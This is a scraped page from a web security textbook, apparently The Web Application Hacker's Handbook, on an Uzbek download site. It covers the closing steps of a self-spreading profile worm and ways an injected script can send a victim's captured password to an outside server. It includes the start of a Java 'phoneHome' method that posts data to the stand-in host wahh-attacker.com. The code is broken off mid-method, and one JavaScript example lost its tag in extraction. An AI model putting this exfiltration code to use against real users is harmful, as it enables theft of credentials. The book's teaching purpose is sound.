The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws

Download 5,76 Mb.

Pdf ko'rish

bet	792/875
Sana	01.01.2022
Hajmi	5,76 Mb.
	#293004

1 ... 788 789 790 791 792 793 794 795 ... 875

Bog'liq
3794 1008 4334

Making Asynchronous Off-Site Requests

462

Chapter 12

■

Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 462

5. Make a

POST

request (including the per-page token) to the user’s Add

Friend page to add the worm’s author as a friend.

6. Make a

GET

request to the user’s Add Hero page to extract the per-page

token that it contains.

7 Make a

POST

request (including the per-page token) to the user’s Add

Hero page to add the worm’s author as a hero and also embed the

source code for the worm itself, so that it will propagate when other

people view the user’s profile.

Making Asynchronous Off-Site Requests

The browser’s same origin policy prevents

XMLHttpRequest

from being used

to make off-site requests, because this would enable a malicious web site to

retrieve and process data from other domains. Hence, in the earlier example,

the attacker could not use

XMLHttpRequest

to submit the user’s existing pass-

word out to an external server which he controls. However, this restriction can

be circumvented by supplementing Ajax with other techniques.

There are numerous ways in which an injected script may cause arbitrary

captured data to be submitted to an external server. To generate a single

request, an image tag can be created with an arbitrary source URL. For exam-

ple, having parsed out the victim’s password from the account details page,

the attacker can transmit this to his server using the following JavaScript:

document.write(“”);

By creating numerous such tags programmatically, it is possible to generate

asynchronous requests to an external server. Another way for an attacker to do

this is to call out to a Java applet from his injected code. For example, the

attacker can create an applet that implements the following method:

import java.io.*;

import java.net.*;

public String phoneHome(String data)

{

try

{

URLConnection urlConn = new URL(

“http://wahh-attacker.com/phonehome”).openConnection();

urlConn.setDoOutput(true);

urlConn.setRequestProperty (“Content-Type”,

“application/x-www-form-urlencoded”);

DataOutputStream dos = new DataOutputStream(

Download 5,76 Mb.

Do'stlaringiz bilan baham:

1 ... 788 789 790 791 792 793 794 795 ... 875